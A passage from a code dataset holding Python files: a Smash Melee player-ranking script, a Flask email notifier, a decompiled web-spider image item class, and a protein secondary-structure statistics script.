\"w\", \"l\"]\r\n Lucky3O = [Squid, Westballz, Plus100]\r\n Lucky3R = [\"w\", \"l\", \"l\"]\r\n Lucky.lvl_calculator(Genesis7, 65, Lucky1O, Lucky1R)\r\n Lucky.lvl_calculator(SavingMrLombardi2, 7, Lucky2O, Lucky2R)\r\n Lucky.lvl_calculator(DreamhackAnaheim, 9, Lucky3O, Lucky3R)\r\n\r\n # Ginger\r\n Ginger1O = [Kalvar, SFAT, Shroomed, n0ne]\r\n Ginger1R = [\"w\", \"w\", \"l\", \"l\"]\r\n Ginger2O = [S2J, Westballz, Ice, Prince_Abu, Franz, SFAT, Fiction, S2J]\r\n Ginger2R = [\"l\", \"l\", \"w\", \"w\", \"w\", \"w\", \"l\", \"l\"]\r\n Ginger3O = [Prince_Abu, Magi, Magi]\r\n Ginger3R = [\"w\", \"w\", \"w\"]\r\n Ginger.lvl_calculator(Genesis7, 17, Ginger1O, Ginger1R)\r\n Ginger.lvl_calculator(SavingMrLombardi2, 5, Ginger2O, Ginger2R)\r\n Ginger.lvl_calculator(HTL5, 1, Ginger3O, Ginger3R)\r\n\r\n # Spark\r\n Spark1O = [Plus100, Free_Palestine, Wizzrobe]\r\n Spark1R = [\"l\", \"w\", \"l\"]\r\n Spark2O = [Fiction, Lucky, Bimbo, Plus100]\r\n Spark2R = [\"l\", \"l\", \"w\", \"l\"]\r\n Spark3O = [Leffen, Ryobeat, Axe, n0ne, iBDW, Hax]\r\n Spark3R = [\"l\", \"w\", \"l\", \"l\", \"l\", \"l\"]\r\n Spark.lvl_calculator(Genesis7, 25, Spark1O, Spark1R)\r\n Spark.lvl_calculator(SavingMrLombardi2, 17, Spark2O, Spark2R)\r\n Spark.lvl_calculator(SmashSummit9, 13, Spark3O, Spark3R)\r\n\r\n # ChuDat\r\n ChuDat1O = [Fiction, TheSWOOPER]\r\n ChuDat1R = [\"l\", \"l\"]\r\n ChuDat.lvl_calculator(Genesis7, 33, ChuDat1O, ChuDat1R)\r\n\r\n # PewPewU\r\n PPU1O = [HugS, Plup, iBDW, Hungrybox, Hax]\r\n PPU1R = [\"w\", \"w\", \"w\", \"l\", \"l\"]\r\n PewPewU.lvl_calculator(Genesis7, 9, PPU1O, PPU1R)\r\n\r\n # lloD\r\n # NONE\r\n\r\n # ARMY\r\n ARMY1O = [Drephen, iBDW, Aura, Plup, Mew2King]\r\n ARMY1R = [\"w\", \"l\", \"w\", \"w\", \"l\"]\r\n ARMY2O = [iBDW, Trif, Albert, Kalamazhu, Squid, Fiction, Captain_Faceroll, Trif, Professor_Pro]\r\n ARMY2R = [\"w\", \"w\", \"w\", \"l\", \"w\", \"l\", \"w\", \"w\", \"l\"]\r\n ARMY3O = [Nut, S2J, Westballz]\r\n ARMY3R = [\"w\", \"l\", \"l\"]\r\n ARMY.lvl_calculator(Genesis7, 17, ARMY1O, ARMY1R)\r\n ARMY.lvl_calculator(SavingMrLombardi2, 5, ARMY2O, ARMY2R)\r\n ARMY.lvl_calculator(DreamhackAnaheim, 4, ARMY3O, ARMY3R)\r\n\r\n # AbsentPage\r\n # NONE\r\n\r\n # Bananas\r\n # NONE\r\n\r\n # KJH\r\n # NONE\r\n\r\n # Shroomed\r\n Shroomed1O = [Rishi, Panda, Ginger, Zain, Swedish_Delight, Hax]\r\n Shroomed1R = [\"w\", \"w\", \"w\", \"l\", \"w\", \"l\"]\r\n Shroomed2O = [Mango, Magi, Plup, Pricent, aMSa]\r\n Shroomed2R = [\"l\", \"w\", \"l\", \"l\", \"l\"]\r\n Shroomed.lvl_calculator(Genesis7, 7, Shroomed1O, Shroomed1R)\r\n Shroomed.lvl_calculator(SmashSummit9, 17, Shroomed2O, Shroomed2R)\r\n\r\n # Westballz\r\n Westballz1O = [Ryobeat, Fiction, Hax]\r\n Westballz1R = [\"w\", \"l\", \"l\"]\r\n Westballz2O = [S2J, Ginger, Ice, Prince_Abu, Franz, MikeHaze]\r\n Westballz2R = [\"l\", \"w\", \"l\", \"l\", \"w\", \"l\"]\r\n Westballz3O = [Schythed, Lucky, Fiction, Tai, ARMY, S2J]\r\n Westballz3R = [\"w\", \"w\", \"l\", \"w\", \"w\", \"l\"]\r\n Westballz.lvl_calculator(Genesis7, 13, Westballz1O, Westballz1R)\r\n Westballz.lvl_calculator(SavingMrLombardi2, 13, Westballz1O, Westballz1R)\r\n Westballz.lvl_calculator(DreamhackAnaheim, 3, Westballz3O, Westballz3R)\r\n\r\n # Medz\r\n Medz1O = [JakenShaken, Wizzrobe]\r\n Medz1R = [\"l\", \"l\"]\r\n Medz.lvl_calculator(Genesis7, 49, Medz1O, Medz1R)\r\n\r\n # Professor_Pro\r\n Prof1O = [Leffen, Leffen]\r\n Prof1R = [\"l\", \"l\"]\r\n Prof2O = [billybopeep, Mew2King, Kodorin, Ice]\r\n Prof2R = [\"w\", \"l\", \"w\", \"l\"]\r\n Prof3O = [SFAT, Captain_Faceroll, MikeHaze, Kodorin, Nut, S2J, iBDW, ARMY, S2J]\r\n Prof3R = [\"l\", \"w\", \"w\", \"w\", \"w\", \"w\", \"l\", \"w\", \"l\"]\r\n Professor_Pro.lvl_calculator(Valhalla3, 2, Prof1O, Prof1R)\r\n Professor_Pro.lvl_calculator(Genesis7, 25, Prof2O, Prof2R)\r\n Professor_Pro.lvl_calculator(SavingMrLombardi2, 4, Prof3O, Prof3R)\r\n\r\n # 2Saint\r\n # NONE\r\n\r\n # Gahtzu\r\n Gahtzu1O = [Plus100, Plus100]\r\n Gahtzu1R = [\"l\", \"l\"]\r\n Gahtzu.lvl_calculator(Genesis7, 49, Gahtzu1O, Gahtzu1R)\r\n\r\n # Albert\r\n Albert1O = [iBDW, Trif, ARMY, Kalamazhu, Squid]\r\n Albert1R = [\"l\", \"l\", \"l\", \"l\", \"w\"]\r\n Albert2O = [Plus100, Tai]\r\n Albert2R = [\"l\", \"l\"]\r\n Albert.lvl_calculator(SavingMrLombardi2, 17, Albert1O, Albert1R)\r\n Albert.lvl_calculator(DreamhackAnaheim, 9, Albert2O, Albert2R)\r\n\r\n # Spud\r\n Spud1O = [FatGoku, Hungrybox, La_Luna]\r\n Spud1R = [\"w\", \"l\", \"l\"]\r\n Spud.lvl_calculator(Genesis7, 33, Spud1O, Spud1R)\r\n\r\n # FatGoku\r\n FatGoku1O = [Spud, Plus100]\r\n FatGoku1R = [\"l\", \"l\"]\r\n FatGoku2O = [TheSWOOPER, Magi, Drephen, Prince_Abu]\r\n FatGoku2R = [\"w\", \"l\", \"w\", \"l\"]\r\n FatGoku.lvl_calculator(Genesis7, 65, FatGoku1O, FatGoku1R)\r\n FatGoku.lvl_calculator(HTL5, 4, FatGoku1O, FatGoku1R)\r\n\r\n # Rishi\r\n Rishi1O = [Shroomed, Ice]\r\n Rishi1R = [\"l\", \"l\"]\r\n Rishi.lvl_calculator(Genesis7, 49, Rishi1O, Rishi1R)\r\n\r\n # Bimbo\r\n Bimbo1O = [Plus100, TheSWOOPER]\r\n Bimbo1R = [\"l\", \"l\"]\r\n Bimbo2O = [Fiction, Spark, Lucky, Plus100, Plus100]\r\n Bimbo2R = [\"l\", \"l\", \"l\", \"l\", \"l\"]\r\n Bimbo.lvl_calculator(Genesis7, 97, Bimbo1O, Bimbo1R)\r\n Bimbo.lvl_calculator(SavingMrLombardi2, 25, Bimbo2O, Bimbo2R)\r\n\r\n # Setchi\r\n # NONE\r\n\r\n # Magi\r\n Magi1O = [Plus100, Plus100]\r\n Magi1R = [\"l\", \"l\"]\r\n Magi2O = [aMSa, Shroomed, Plup, Pricent, Fiction, Wizzrobe]\r\n Magi2R = [\"l\", \"l\", \"l\", \"w\", \"l\", \"l\"]\r\n Magi3O = [TheRealThing, FatGoku, Ginger, Prince_Abu, Ginger]\r\n Magi3R = [\"w\", \"w\", \"l\", \"w\", \"l\"]\r\n Magi.lvl_calculator(Genesis7, 129, Magi1O, Magi1R)\r\n Magi.lvl_calculator(SmashSummit9, 13, Magi2O, Magi2R)\r\n Magi.lvl_calculator(HTL5, 2, Magi3O, Magi3R)\r\n\r\n # Morsecode762\r\n # NONE\r\n\r\n # JakenShaken\r\n JS1O = [Medz, Zain, Plus100]\r\n JS1R = [\"w\", \"l\", \"l\"]\r\n JakenShaken.lvl_calculator(Genesis7, 33, JS1O, JS1R)\r\n\r\n # HugS\r\n Hugs1O = [PewPewU, Prince_Abu]\r\n Hugs1R = [\"l\", \"l\"]\r\n Hugs2O = [Plus100, Squid]\r\n Hugs2R = [\"l\", \"l\"]\r\n HugS.lvl_calculator(Genesis7, 65, Hugs1O, Hugs1R)\r\n HugS.lvl_calculator(SavingMrLombardi2, 33, Hugs2O, Hugs2R)\r\n\r\n # Stango\r\n # NONE\r\n\r\n # Zamu\r\n Zamu1O = [Plus100, Wizzrobe]\r\n Zamu1R = [\"l\", \"l\"]\r\n Zamu.lvl_calculator(Genesis7, 65, Zamu1O, Zamu1R)\r\n\r\n # Drephen\r\n Drephen1O = [ARMY, Plus100]\r\n Drephen1R = [\"l\", \"l\"]\r\n Drephen2O = [Prince_Abu, FatGoku]\r\n Drephen2R = [\"l\", \"l\"]\r\n Drephen.lvl_calculator(Genesis7, 65, Drephen1O, Drephen1R)\r\n Drephen.lvl_calculator(HTL5, 5, Drephen2O, Drephen2R)\r\n\r\n # Michael\r\n # NONE\r\n\r\n # Ice\r\n Ice1O = [Lucky, aMSa, Rishi, Professor_Pro, iBDW]\r\n Ice1R = [\"w\", \"l\", \"w\", \"w\", \"l\"]\r\n Ice2O = [Westballz, Franz, S2J, Ginger, Prince_Abu]\r\n Ice2R = [\"w\", \"w\", \"l\", \"l\", \"l\"]\r\n Ice.lvl_calculator(Genesis7, 17, Ice1O, Ice1R)\r\n Ice.lvl_calculator(SavingMrLombardi2, 17, Ice2O, Ice2R)\r\n\r\n # billybopeep\r\n BBP1O = [Professor_Pro, BBB, SFAT]\r\n BBP1R = [\"l\", \"w\", \"l\"]\r\n billybopeep.lvl_calculator(Genesis7, 33, BBP1O, BBP1R)\r\n\r\n # La Luna\r\n LaLuna1O = [Plus100, Joyboy, Spud, Swedish_Delight]\r\n LaLuna1R = [\"l\", \"w\", \"w\", \"l\"]\r\n La_Luna.lvl_calculator(Genesis7, 25, LaLuna1O, LaLuna1R)\r\n\r\n # Colbol\r\n # NONE\r\n\r\n # OverTriforce\r\n Over1O = [Frenzy, Plus100]\r\n Over1R = [\"l\", \"l\"]\r\n OverTriforce.lvl_calculator(Valhalla3, 5, Over1O, Over1R)\r\n\r\n # Slox\r\n # NONE\r\n\r\n # Kalamazhu\r\n Kzhu1O = [Plus100, Plus100]\r\n Kzhu1R = [\"l\", \"l\"]\r\n Kzhu2O = [iBDW, Trif, ARMY, Albert, Squid, S2J]\r\n Kzhu2R = [\"l\", \"w\", \"w\", \"w\", \"w\", \"l\"]\r\n Kalamazhu.lvl_calculator(Genesis7, 97, Kzhu1O, Kzhu1R)\r\n Kalamazhu.lvl_calculator(SavingMrLombardi2, 9, Kzhu2O, Kzhu2R)\r\n\r\n # Nickemwit\r\n # NONE\r\n\r\n # Jerry\r\n # NONE\r\n\r\n # Aura\r\n Aura1O = [Hax, Tai, ARMY]\r\n Aura1R = [\"l\", \"w\", \"l\"]\r\n Aura.lvl_calculator(Genesis7, 33, Aura1O, Aura1R)\r\n\r\n # Nut\r\n Nut1O = [Plus100, Moky]\r\n Nut1R = [\"l\", \"l\"]\r\n Nut2O = [Prince_Abu, SFAT, Captain_Faceroll, MikeHaze, Professor_Pro, Kodorin]\r\n Nut2R = [\"l\", \"l\", \"l\", \"l\", \"l\", \"l\"]\r\n Nut3O = [Kurv, ARMY, Plus100]\r\n Nut3R = [\"w\", \"l\", \"l\"]\r\n Nut.lvl_calculator(Genesis7, 65, Nut1O, Nut1R)\r\n Nut.lvl_calculator(SavingMrLombardi2, 25, Nut2O, Nut2R)\r\n Nut.lvl_calculator(DreamhackAnaheim, 17, Nut3O, Nut3R)\r\n\r\n # Kalvar\r\n Kalvar1O = [Ginger, Plus100]\r\n Kalvar1R = [\"l\", \"l\"]\r\n Kalvar.lvl_calculator(Genesis7, 65, Kalvar1O, Kalvar1R)\r\n\r\n # Polish\r\n # NONE\r\n\r\n # Kevin Maples\r\n KevinMaples1O = [Swedish_Delight, Moky]\r\n KevinMaples1R = [\"l\", \"l\"]\r\n Kevin_Maples.lvl_calculator(Genesis7, 49, KevinMaples1O, KevinMaples1R)\r\n\r\n # Bladewise\r\n Bladewise1O = [Captain_Faceroll, Plus100]\r\n Bladewise1R = [\"l\", \"l\"]\r\n Bladewise.lvl_calculator(Genesis7, 65, Bladewise1O, Bladewise1R)\r\n\r\n # Tai\r\n Tai1O = [SFAT, Aura]\r\n Tai1R = [\"l\", \"l\"]\r\n Tai2O = [MikeHaze, S2J, Albert, Schythed, Westballz]\r\n Tai2R = [\"w\", \"l\", \"w\", \"w\", \"l\"]\r\n Tai.lvl_calculator(Genesis7, 49, Tai1O, Tai1R)\r\n Tai.lvl_calculator(DreamhackAnaheim, 5, Tai2O, Tai2R)\r\n\r\n # Squid\r\n Squid1O = [Franz, HugS, iBDW, Trif, ARMY, Albert, Kalamazhu]\r\n Squid1R = [\"l\", \"w\", \"l\", \"l\", \"l\", \"l\", \"l\"]\r\n Squid2O = [Lucky, Schythed]\r\n Squid2R = [\"l\", \"l\"]\r\n Squid.lvl_calculator(SavingMrLombardi2, 25, Squid1O, Squid1R)\r\n Squid.lvl_calculator(DreamhackAnaheim, 13, Squid2O, Squid2R)\r\n\r\n # Forrest\r\n Forrest1O = [HTwa, Moky, Trif, Wizzrobe]\r\n Forrest1R = [\"w\", \"w\", \"l\", \"l\"]\r\n Forrest.lvl_calculator(Genesis7, 33, Forrest1O, Forrest1R)\r\n\r\n # Joyboy\r\n Joyboy1O = [S2J, La_Luna]\r\n Joyboy1R = [\"l\", \"l\"]\r\n Joyboy.lvl_calculator(Genesis7, 65, Joyboy1O, Joyboy1R)\r\n\r\n # Kodorin\r\n Kodorin1O = [n0ne, Professor_Pro]\r\n Kodorin1R = [\"l\", \"l\"]\r\n Kodorin2O = [Franz, SFAT, Captain_Faceroll, MikeHaze, Professor_Pro, Nut]\r\n Kodorin2R = [\"w\", \"l\", \"l\", \"w\", \"l\", \"w\"]\r\n Kodorin.lvl_calculator(Genesis7, 33, Kodorin1O, Kodorin1R)\r\n Kodorin.lvl_calculator(SavingMrLombardi2, 17, Kodorin2O, Kodorin2R)\r\n\r\n # Ryan Ford\r\n # NONE\r\n\r\n # Free Palestine\r\n FP1O = [Fiction, Spark]\r\n FP1R = [\"l\", \"l\"]\r\n Free_Palestine.lvl_calculator(Genesis7, 49, FP1O, FP1R)\r\n\r\n # Ryobeat\r\n Ryobeat1O = [Umarth, Wizzrobe, Westballz, Moky, TheSWOOPER, S2J]\r\n Ryobeat1R = [\"w\", \"w\", \"l\", \"w\", \"w\", \"l\"]\r\n Ryobeat2O = [Axe, Spark, BBB, Wizzrobe, n0ne]\r\n Ryobeat2R = [\"l\", \"l\", \"l\", \"l\", \"l\"]\r\n Ryobeat.lvl_calculator(Genesis7, 17, Ryobeat1O, Ryobeat1R)\r\n Ryobeat.lvl_calculator(SmashSummit9, 17, Ryobeat2O, Ryobeat2R)\r\n\r\n # Ka-Master\r\n # NONE\r\n\r\n # Kurv\r\n Kurv1O = [Plus100, Plus100]\r\n Kurv1R = [\"l\", \"l\"]\r\n Kurv2O = [Plus100, Plus100]\r\n Kurv2R = [\"l\", \"l\"]\r\n Kurv3O = [Plus100, Nut]\r\n Kurv3R = [\"l\", \"l\"]\r\n Kurv.lvl_calculator(Genesis7, 97, Kurv1O, Kurv1R)\r\n Kurv.lvl_calculator(SavingMrLombardi2, 33, Kurv2O, Kurv2R)\r\n Kurv.lvl_calculator(DreamhackAnaheim, 33, Kurv3O, Kurv3R)\r\n\r\n # Frenzy\r\n Frenzy1O = [OverTriforce, Leffen, Trif]\r\n Frenzy1R = [\"w\", \"l\", \"l\"]\r\n Frenzy.lvl_calculator(Valhalla3, 5, Frenzy1O, Frenzy1R)\r\n\r\n # MoG\r\n # NONE\r\n\r\n # Boyd\r\n Boyd1O = [Zain, Plus100]\r\n Boyd1R = [\"l\", \"l\"]\r\n Boyd.lvl_calculator(Genesis7, 65, Boyd1O, Boyd1R)\r\n\r\n # Cool Lime\r\n # NONE\r\n\r\n # Bobby Big Ballz\r\n BBB1O = [iBDW, billybopeep]\r\n BBB1R = [\"l\", \"l\"]\r\n BBB2O = [Wizzrobe, iBDW, Ryobeat, Axe, Leffen, aMSa]\r\n BBB2R = [\"l\", \"l\", \"w\", \"l\", \"l\", \"l\"]\r\n BBB.lvl_calculator(Genesis7, 49, BBB1O, BBB1R)\r\n BBB.lvl_calculator(SmashSummit9, 13, BBB2O, BBB2R)\r\n\r\n # Nintendude\r\n Nintendude1O = [Panda, Plus100]\r\n Nintendude1R = [\"l\", \"l\"]\r\n Nintendude.lvl_calculator(Genesis7, 97, Nintendude1O, Nintendude1R)\r\n\r\n # Franz\r\n Franz1O = [Plus100, Plus100]\r\n Franz1R = [\"l\", \"l\"]\r\n Franz2O = [Squid, Kodorin, S2J, Ginger, Westballz, Ice, Prince_Abu]\r\n Franz2R = [\"w\", \"l\", \"l\", \"l\", \"l\", \"l\", \"l\"]\r\n Franz.lvl_calculator(Genesis7, 129, Franz1O, Franz1R)\r\n Franz.lvl_calculator(SavingMrLombardi2, 25, Franz1O, Franz1R)\r\n\r\n # Nicki\r\n Nicki1O = [Mango, TheSWOOPER]\r\n Nicki1R = [\"l\", \"l\"]\r\n Nicki.lvl_calculator(Genesis7, 65, Nicki1O, Nicki1R)\r\n\r\n # Lint\r\n # NONE\r\n\r\n # King Momo\r\n # NONE\r\n\r\n # TheRealThing\r\n TRT1O = [Schythed, Plus100]\r\n TRT1R = [\"l\", \"l\"]\r\n TRT2O = [Magi, Prince_Abu]\r\n TRT2R = [\"l\", \"l\"]\r\n TheRealThing.lvl_calculator(Genesis7, 65, TRT1O, TRT1R)\r\n TheRealThing.lvl_calculator(HTL5, 5, TRT2O, TRT2R)\r\n\r\n # Umarth\r\n Umarth1O = [Ryobeat, Plus100]\r\n Umarth1R = [\"l\", \"l\"]\r\n Umarth.lvl_calculator(Genesis7, 65, Umarth1O, Umarth1R)\r\n\r\n # Zeo\r\n Zeo1O = [Plus100, Plus100]\r\n Zeo1R = [\"l\", \"l\"]\r\n Zeo.lvl_calculator(SavingMrLombardi2, 25, Zeo1O, Zeo1R)\r\n\r\n # Pricent\r\n Pricent1O = [Fiction, aMSa, Shroomed, Magi, Hax, iBDW]\r\n Pricent1R = [\"l\", \"l\", \"w\", \"l\", \"l\", \"l\"]\r\n Pricent.lvl_calculator(SmashSummit9, 13, Pricent1O, Pricent1R)\r\n\r\n # Prince Abu\r\n PA1O = [Rocky, HugS, MikeHaze]\r\n PA1R = [\"l\", \"w\", \"l\"]\r\n PA2O = [Nut, S2J, Ginger, Westballz, Ice, Franz, Captain_Faceroll]\r\n PA2R = [\"w\", \"l\", \"l\", \"w\", \"w\", \"w\", \"l\"]\r\n PA3O = [Drephen, Ginger, TheRealThing, FatGoku, Magi]\r\n PA3R = [\"w\", \"l\", \"w\", \"w\", \"l\"]\r\n Prince_Abu.lvl_calculator(Genesis7, 33, PA1O, PA1R)\r\n Prince_Abu.lvl_calculator(SavingMrLombardi2, 13, PA2O, PA2R)\r\n Prince_Abu.lvl_calculator(HTL5, 3, PA3O, PA3R)\r\n\r\n # Amsah\r\n # NONE\r\n\r\n # Rocky\r\n Rocky1O = [Prince_Abu, Plup, Plus100]\r\n Rocky1R = [\"w\", \"l\", \"l\"]\r\n Rocky.lvl_calculator(Genesis7, 49, Rocky1O, Rocky1R)\r\n\r\n # Sharkz\r\n # NONE\r\n\r\n # HTwa\r\n HTwa1O = [Forrest, Plus100]\r\n HTwa1R = [\"l\", \"l\"]\r\n HTwa.lvl_calculator(Genesis7, 129, HTwa1O, HTwa1R)\r\n\r\n # Kage\r\n # NONE\r\n\r\n # Schythed\r\n Schythed1O = [TheRealThing, Leffen, Plus100]\r\n Schythed1R = [\"w\", \"l\", \"l\"]\r\n Schythed.lvl_calculator(Genesis7, 65, Schythed1O, Schythed1R)\r\n\r\n # Panda\r\n Panda1O = [Nintendude, Axe, Shroomed, SFAT]\r\n Panda1R = [\"w\", \"w\", \"l\", \"l\"]\r\n Panda.lvl_calculator(Genesis7, 25, Panda1O, Panda1R)\r\n\r\n # Soonsay\r\n Soonsay1O = [Mew2King, Plus100]\r\n Soonsay1R = [\"l\", \"l\"]\r\n Soonsay.lvl_calculator(Genesis7, 65, Soonsay1O, Soonsay1R)\r\n\r\n # TheSWOOPER\r\n TS1O = [Plus100, Bimbo, Nicki, ChuDat, Ryobeat]\r\n TS1R = [\"l\", \"w\", \"w\", \"w\", \"l\"]\r\n TS2O = [FatGoku, Plus100]\r\n TS2R = [\"l\", \"l\"]\r\n TheSWOOPER.lvl_calculator(Genesis7, 25, TS1O, TS1R)\r\n TheSWOOPER.lvl_calculator(HTL5, 9, TS2O, TS2R)\r\n\r\n # Snowy\r\n # NONE\r\n\r\n # TOP 100 MPGR PLAYERS DONE\r\n\r\n # Main part\r\n printSortedPlayers(player_list)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"ear-m-static.py","file_name":"ear-m-static.py","file_ext":"py","file_size_in_byte":32184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"307015580","text":"import os\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\nfrom flask import current_app\nfrom jinja2 import Environment, FileSystemLoader\n\nenv = Environment(loader=FileSystemLoader('%s/templates/' % os.path.dirname(__file__)))\n\ndef send(*args):\n to_email, intervention_id, what_happens_label = args\n from_email = current_app.config[\"FROM_EMAIL\"]\n\n template = env.get_template('email.html')\n intervention_url = f\"{current_app.config['ENKI_FRONT_BASE_URI']}/detail-intervention/{intervention_id}\"\n body_content = template.render(\n intervention_url=intervention_url,\n what_happens_label=what_happens_label\n )\n message = MIMEMultipart()\n message.attach(MIMEText(body_content, \"html\"))\n message['Subject'] = 'Une nouvelle intervention a commencé sur votre communne'\n message['From'] = from_email\n message['To'] = to_email\n msg_body = message.as_string()\n\n s = smtplib.SMTP('mailhog:1025')\n s.sendmail(from_email, to_email, msg_body)\n s.quit()\n","sub_path":"backend/src/adapters/notifications/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"4578097","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win-amd64\\egg\\AsyncSpider\\implements\\item.py\n# Compiled at: 2018-03-10 15:31:10\n# Size of source mod 2**32: 333 bytes\nfrom ..core import Item, Field, Spider\n__all__ = ['ImageItem']\n\nclass ImageItem(Item):\n url = Field()\n content = Field()\n\n @classmethod\n async def load(cls, spider: Spider, img_url, **kwargs):\n resp = await (spider.fetch)('get', img_url, **kwargs)\n return cls(url=(resp.url), content=(resp.content))","sub_path":"pycfiles/AsyncSpider-0.4.2-py3.6/item.cpython-36.py","file_name":"item.cpython-36.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"218632404","text":"import numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\nimport pandas as pd\nimport os\n\n#\n# Analyzes the predicted data, smaller version of getStatistics.py.\n# Saves the statistics in npy files in the 'data analysis/predicted' folder\n#\n\nproteins_path='../mheinzinger/contact_prediction_v2/targets/dssp'\nseq_path='../mheinzinger/contact_prediction_v2/sequences'\nanna_path='dataset_preprocessed'\ntargets_path='/home/mheinzinger/contact_prediction_v2/targets'\nstatistics_dir='data analysis/predicted'\n\nattributes={}\n\ndef readResidues(path):\n if(os.path.isfile(path)):\n f = open(path, 'r')\n residues_input = f.read().splitlines()\n f.close()\n residues=''\n for i in range(len(residues_input)):\n if(i>0):\n if(residues_input[i][0]=='>'):\n break\n residues += residues_input[i]\n return residues\n else:\n print('no residue')\n\ndef readStructures3(protein):\n path = proteins_path + '/'+protein.lower() + '/' + protein.lower() + '.3.consensus.dssp'\n if(os.path.isfile(path)):\n f = open(path, 'r')\n structures_input = f.read().splitlines()\n f.close()\n structures=''\n for i in range(len(structures_input)):\n if(i>0):\n structures += structures_input[i]\n return structures\n else:\n print('no 3 file of', protein)\n\ndef readStructures8(protein):\n path = proteins_path + '/'+ protein.lower() + '/' + protein.lower() + '.8.consensus.dssp'\n if(os.path.isfile(path)):\n f = open(path, 'r')\n structures_input = f.read().splitlines()\n f.close()\n structures = ''\n for i in range(len(structures_input)):\n if (i > 0):\n structures += structures_input[i]\n return structures\n else:\n print('no 8 file of ', protein)\n\ndef getInput(classification_mode): #proteins in a folder named root+proteins/\n dict={}\n lengths=[]\n i=0\n for prot in os.listdir(anna_path):\n i+=1\n res=readResidues(seq_path+'/'+prot.upper()+'.fasta.txt')\n lengths.append(len(res))\n if(classification_mode==3):\n str=readStructures3(prot.lower())\n elif(classification_mode==8):\n str=readStructures8(prot.lower())\n else:\n raise ValueError('[ERROR] Either 3 or 8 classes')\n\n solvAcc=np.memmap(targets_path + '/dssp/' + prot.lower() + '/' + prot.lower() + '.rel_asa.memmap',\n dtype=np.float32, mode='r', shape=len(res))\n solvAcc=np.nan_to_num(solvAcc)\n\n flex=np.memmap(targets_path + '/bdb_bvals/' + prot.lower() + '.bdb.memmap', dtype=np.float32, mode='r', shape=len(res))\n flex=np.nan_to_num(flex)\n if(str!=None and res!=None and solvAcc!=None and flex!=None):\n tmp = {prot: (res, str, solvAcc, flex)}\n dict.update(tmp)\n return dict, lengths\n\ndef countStructures3(dict, f):\n c = 0\n h = 0\n e = 0\n xy = 0\n for sample in dict.keys():\n seq=dict[sample][0].cpu().numpy()[0]\n original_len=dict[sample][1].cpu().numpy()\n mask=dict[sample][2].cpu().numpy()[0]\n mask = mask[:original_len]\n xy_idx = np.where(mask == 0.0)\n seq[xy_idx] = 3\n sequence=''\n for i in seq:\n sequence+=str(i)\n sequence=sequence[:original_len]\n sequence=sequence.replace('0','C')\n sequence = sequence.replace('1', 'H')\n sequence = sequence.replace('2', 'E')\n sequence = sequence.replace('3', 'X')\n\n for i in range(len(sequence)):\n if(sequence[i]=='C'):\n c+=1\n elif(sequence[i]=='H'):\n h+=1\n elif(sequence[i]=='E'):\n e+=1\n elif(sequence[i]=='X' or sequence[i]=='Y'):\n xy+=1\n else:\n raise ValueError('Unknown structure', sequence[i])\n\n f.write('\\n')\n f.write('### DSSP3 Classes ###\\n')\n f.write(str('(C, H, E, XY): '+str(c)+' '+str(h)+' '+str(e)+' '+str(xy)+'\\n'))\n f.write('\\n')\n counts=np.array([c,h,e,xy])\n np.save(statistics_dir+'/countClasses_3',counts)\n tmp={'proportions3':counts}\n attributes.update(tmp)\n\ndef countStructures8(dict, f):\n h = 0\n e = 0\n t = 0\n s = 0\n b = 0\n ii = 0\n g = 0\n none = 0\n xy = 0\n for sample in dict.keys():\n seq = dict[sample][0].cpu().numpy()[0]\n original_len = dict[sample][1].cpu().numpy()\n mask = dict[sample][2].cpu().numpy()[0]\n mask = mask[:original_len]\n xy_idx = np.where(mask == 0.0)\n seq[xy_idx] = 8\n sequence = ''\n for i in seq:\n sequence += str(i)\n sequence = sequence[:original_len]\n sequence = sequence.replace('0', 'H')\n sequence = sequence.replace('1', 'E')\n sequence = sequence.replace('2', 'I')\n sequence = sequence.replace('3', 'S')\n sequence = sequence.replace('4', 'T')\n sequence = sequence.replace('5', 'G')\n sequence = sequence.replace('6', 'B')\n sequence = sequence.replace('7', '-')\n sequence = sequence.replace('8', 'X')\n for i in range(len(sequence)):\n if(sequence[i]=='H'):\n h+=1\n elif (sequence[i] == 'I'):\n ii += 1\n elif(sequence[i]=='E'):\n e+=1\n elif (sequence[i] == 'G'):\n g += 1\n elif (sequence[i] == 'T'):\n t += 1\n elif (sequence[i] == 'S'):\n s += 1\n elif (sequence[i] == 'B'):\n b += 1\n elif (sequence[i] == '-'):\n none += 1\n elif (sequence[i] == 'Y' or sequence[i]=='X'):\n xy += 1\n else:\n print('unknown found:', sequence[i])\n return 0,0,0,0,0,0,0,0,0 #TODO: check if this is correct!\n\n f.write('\\n')\n f.write('### DSSP8 Classes ###\\n')\n f.write('(H, E, I, S, T, G, B, -, XY): '+str(h)+' '+str(e)+' '+str(i)+' '+str(s)+' '+str(t)+' '+str(g)+' '+str(b)+' '+str(none)+' '+str(xy)+'\\n')\n f.write('\\n')\n counts=np.array([h,e,ii,s,t,g,b,none,xy])\n np.save(statistics_dir + '/countClasses_8', counts)\n tmp={'proportions8':counts}\n attributes.update(tmp)\n\ndef countStructureChains3_dict(dict, f):\n def countStructureChains3(sequence):\n C = []\n H = []\n E = []\n i = 0\n\n while i < len(sequence):\n tmp = sequence[i]\n cnt = 1\n\n if (i < len(sequence) - 1):\n while (sequence[i + 1] == tmp):\n cnt += 1\n i = i + 1\n if (i == (len(sequence) - 1)):\n break\n if (tmp == 'C'):\n C.insert(0, cnt)\n elif (tmp == 'H'):\n H.insert(0, cnt)\n elif (tmp == 'E'):\n E.insert(0, cnt)\n i = i + 1\n\n matrix = np.zeros((max(len(np.bincount(C)), len(np.bincount(H)), len(np.bincount(E))), 3), dtype=int)\n counts = pd.DataFrame(matrix,\n columns=['C', 'H', 'E'],\n index=[np.arange(max(len(np.bincount(C)), len(np.bincount(H)), 